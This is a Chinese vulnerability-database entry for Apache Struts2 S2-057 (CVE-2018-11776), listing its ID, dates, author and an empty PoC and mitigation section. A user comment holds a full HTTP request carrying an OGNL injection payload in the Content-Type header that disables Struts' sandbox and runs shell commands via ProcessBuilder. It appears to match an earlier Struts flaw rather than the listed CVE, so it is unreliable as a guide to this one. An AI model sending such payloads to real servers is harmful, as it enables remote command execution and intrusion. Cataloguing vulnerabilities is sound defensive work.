Apache Struts2 S2-057(CVE-2018-11776)

哮天犬

基本字段

漏洞编号:
SSV-97497
披露/发现时间:
未知
提交时间:
2018-08-22
漏洞等级:
漏洞类别:
命令执行
影响组件:
Apache Struts
(影响版本较多,点击查看)
漏洞作者:
Man Yue Mo
提交者:
Knownsec
CVE-ID:
CVE-2018-11776
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

贡献者 共获得  0KB
Loading icon
共 0  兑换了

PoC (pocsuite 插件) (pocsuite 插件)

贡献者 Knownsec 共获得   0KB
暂未开放
共 0 兑换

参考链接

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

防护方案

暂无防护方案

人气 10894
评论前需绑定手机 现在绑定

全部评论 (2)

  • GET /index.action HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) Accept: */* Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','echo windows--2017'}:{'/bin/bash','-c','echo linux--2017'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} Host: 127.0.0.1:8080 Connection: Keep-Alive
    2F
  • where is POC ?
    1F

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负